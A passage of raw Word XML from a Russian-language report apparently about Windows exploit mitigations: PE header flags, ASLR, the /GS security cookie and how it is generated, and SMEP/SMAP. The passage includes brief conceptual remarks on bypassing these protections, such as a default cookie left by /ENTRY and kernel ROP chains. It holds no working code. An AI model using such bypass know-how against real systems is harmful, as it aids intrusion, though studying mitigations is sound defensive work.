      <w:r w:rsidRPr="00BB3637">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7521">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3637">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7521">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LARGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3637">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7521">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADDRESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3637">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7521">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AWARE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3637">
        <w:t>​</w:t>
      </w:r>
      <w:r w:rsidR="00BB3637" w:rsidRPr="00BB3637">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BB3637">
        <w:t xml:space="preserve"> п</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">риложение способно работать с памятью, объёмом больше 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE3A0D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F636F53" w14:textId="77777777" w:rsidR="00EB4A04" w:rsidRDefault="00301363" w:rsidP="0062468D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Бит 12 – IMAGE_FILE_SYSTEM​</w:t>
      </w:r>
      <w:r w:rsidR="009A7520">
        <w:t>: е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сли </w:t>
      </w:r>
      <w:r w:rsidR="009A7520">
        <w:t>установлен</w:t>
      </w:r>
      <w:r>
        <w:t>, значит это системный файл типа драйвера</w:t>
      </w:r>
      <w:r w:rsidR="006D23CF">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BBC3D" w14:textId="2EDC2130" w:rsidR="00301363" w:rsidRDefault="00301363" w:rsidP="003B6285">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Бит 13 – IMAGE_FILE_DLL​</w:t>
      </w:r>
      <w:r w:rsidR="00EB4A04">
        <w:t>: установленный</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> бит является признаком DLL-библиотеки.​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F354BC7" w14:textId="7FE0D4C7" w:rsidR="00B1704A" w:rsidRDefault="00301363" w:rsidP="00301363">
      <w:r>
        <w:t>​Использование ASLR может защитить приложения от эксплуатации некоторых видов уязвимостей, в том числе и переполнения буфера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F379C4" w14:textId="77777777" w:rsidR="00301363" w:rsidRPr="00B1704A" w:rsidRDefault="00301363" w:rsidP="00301363"/>
    <w:p w14:paraId="78FD821B" w14:textId="3586A615" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A4958" w14:textId="4E334019" w:rsidR="0075305E" w:rsidRDefault="0075305E" w:rsidP="0075305E">
      <w:r w:rsidRPr="0075305E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer security check - </w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> compile-based </w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:t>защита</w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:t>компилятора</w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft C/C++. </w:t>
      </w:r>
      <w:r w:rsidRPr="0075305E">
        <w:t>Представлена она в виде ключа компиляции /GS, который включен по дефолту. Компилятор сам определяет функции в программе, которые могут быть подвержены переполнению буфера и защищает их.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46D9B6" w14:textId="048149E0" w:rsidR="0075305E" w:rsidRPr="00C232AF" w:rsidRDefault="00512B9A" w:rsidP="0075305E">
      <w:r>
        <w:t xml:space="preserve">Различия в программах, скомпилированных с этим флагом и без него можно увидеть при дизассемблировании, например в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r>
        <w:t>, как показано на рисунке.</w:t>
      </w:r>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00622886">
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t xml:space="preserve">екое значение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00622886">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t xml:space="preserve"> записывается в начале функции и проверяется в конце (__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>security_check_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00622886" w:rsidRPr="00622886">
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidR="00C232AF">
        <w:t xml:space="preserve">. Это значит, что на стеке теперь существует область </w:t>
      </w:r>
      <w:r w:rsidR="00C232AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00C232AF" w:rsidRPr="00C232AF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00C232AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00C232AF">
        <w:t>, которая затирается при выходе за границу буфера, и в таком случае программа мгновенно завершится, препятствуя эксплуатации уязвимости, что показано на</w:t>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:instrText xml:space="preserve"> REF _Ref212401210 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009D72E9">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C232AF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D49A03" w14:textId="77777777" w:rsidR="00512B9A" w:rsidRDefault="00512B9A" w:rsidP="00512B9A">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B5DC96" wp14:editId="39F4BE5B">
            <wp:extent cx="4991100" cy="30866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68" cy="308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DB3F" w14:textId="0FD0A848" w:rsidR="00512B9A" w:rsidRPr="00B55FB4" w:rsidRDefault="00512B9A" w:rsidP="00512B9A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>Рисунок</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EB15DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="00512B9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Security Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1747CF4B" w14:textId="77777777" w:rsidR="00AB4DBF" w:rsidRPr="00B55FB4" w:rsidRDefault="00AB4DBF" w:rsidP="00AB4DBF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190139F5" w14:textId="77777777" w:rsidR="00AB4DBF" w:rsidRDefault="00AB4DBF" w:rsidP="00AB4DBF">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B4AA86E" wp14:editId="73DCB9E6">
            <wp:extent cx="5783580" cy="301688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4"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="578358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59C9" w14:textId="0C7FAD68" w:rsidR="00C232AF" w:rsidRDefault="00AB4DBF" w:rsidP="00AB4DBF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref2124012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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"> – Появление области </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4DBF">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4DBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на стеке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4198F" w14:textId="5623FDB0" w:rsidR="00596EAA" w:rsidRDefault="00596EAA" w:rsidP="00596EAA"/>
    <w:p w14:paraId="35D6CB4E" w14:textId="23BCB068" w:rsidR="00280A0E" w:rsidRDefault="0034325A" w:rsidP="00596EAA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Генерация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:t xml:space="preserve">происходит в начале работы программы </w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:t xml:space="preserve">(в функциях инициализации </w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00276188" w:rsidRPr="00276188">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Runtime</w:t>
      </w:r>
      <w:r w:rsidR="00276188" w:rsidRPr="00276188">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:t xml:space="preserve">до вызова </w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00276188" w:rsidRPr="00276188">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00276188">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:t>при выполнении одного из двух условий (</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> == 0</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BB</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:t xml:space="preserve">– сравнение со стандартным значением; </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FFFF</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B" w:rsidRPr="00FE785B">
        <w:t>0000 == 0)</w:t>
      </w:r>
      <w:r w:rsidR="00FE785B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve"> По своей сути </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve">результат </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00676331">
        <w:t>значений</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve"> текущих даты/времени, </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve"> потока, </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve">процесса, </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t xml:space="preserve">с повышенной точностью, возвращаемых функциями </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetSystemTimeAsFileTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetCurrentThreadId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetCurrentProcessId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00676331">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QueryPerformanceCounter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00676331" w:rsidRPr="00676331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t>соответственно</w:t>
      </w:r>
      <w:r w:rsidR="003E4A5D">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:instrText xml:space="preserve"> REF _Ref212403477 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00DB644F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00676331">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B04BA">
        <w:t xml:space="preserve"> В случае, если значение</w:t>
      </w:r>
      <w:r w:rsidR="002B1631">
        <w:t xml:space="preserve">, которое находится на стеке, не совпадает со сгенерированным, то вызывается </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1631">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TerminateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1631">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00280A0E" w:rsidRPr="00280A0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21E07D" w14:textId="77777777" w:rsidR="00B55FB4" w:rsidRDefault="00280A0E" w:rsidP="00B55FB4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64515B37" wp14:editId="202531C3">
            <wp:extent cx="4343400" cy="5305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81" cy="53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6AD3" w14:textId="5FA651B1" w:rsidR="0034325A" w:rsidRPr="00AB4905" w:rsidRDefault="00B55FB4" w:rsidP="00DE0487">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref2124034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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve"> – Генерация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4905">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C7227" w14:textId="77777777" w:rsidR="003F04A4" w:rsidRPr="00AB4905" w:rsidRDefault="003F04A4" w:rsidP="003F04A4"/>
    <w:p w14:paraId="57AB46B5" w14:textId="007A1099" w:rsidR="00C17761" w:rsidRDefault="00344AFD" w:rsidP="00582B26">
      <w:r>
        <w:t xml:space="preserve">Если программа компилируется с флагом </w:t>
      </w:r>
      <w:r w:rsidRPr="00344AFD">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ENTRY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, то процедура генерации не происходит автоматически, ее потребуется вызывать вручную, иначе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00344AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00344AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>примет стандартное значение и злоумышленник сможет обойти эту проверку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664DB2A" w14:textId="77777777" w:rsidR="00596EAA" w:rsidRPr="00596EAA" w:rsidRDefault="00596EAA" w:rsidP="00596EAA"/>
    <w:p w14:paraId="753C3AE9" w14:textId="367B94BD" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA83BB" w14:textId="16731D79" w:rsidR="0060365B" w:rsidRPr="00AB4905" w:rsidRDefault="0060365B" w:rsidP="0060365B">
      <w:r>
        <w:t>SMEP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Supervisor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Mode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) — это механизм защиты, который предотвращает выполнение кода, расположенного в пользовательском адресном пространстве, в то время, когда код выполняется в режиме ядра. В каком-то смысле SMEP является аналогом DEP (Data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), и, также как </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DEP, его </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>можно обойти</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> используя Return-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ROP, возвратно-ориентированное программирование). Однако набор ROP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> должны быть из пространства ядра. SMAP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Supervisor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Mode Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Prevention</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) — это механизм защиты, похожий на SMEP, но запрещающий доступ к пользовательской памяти из режима ядра. То есть, SMAP защищает данные, находящиеся в пользовательской памяти от чтения и изменения из режима ядра. На первый взгляд кажется, что особых трудностей это не вызывает, но... Это значит, что вся цепочка ROP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> должна находится в стеке ядра, так как пользовательский стек находится в пространстве пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E492431" w14:textId="3551CCD6" w:rsidR="006D0F2A" w:rsidRDefault="0060365B" w:rsidP="0060365B">
      <w:r>
        <w:t>Состояние SMEP и SMAP управляется флагами в регистре CR4</w:t>
      </w:r>
      <w:r w:rsidR="00730D59">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="000F41FA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000F41FA">
        <w:instrText xml:space="preserve"> REF _Ref212407136 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="000F41FA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F41FA">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
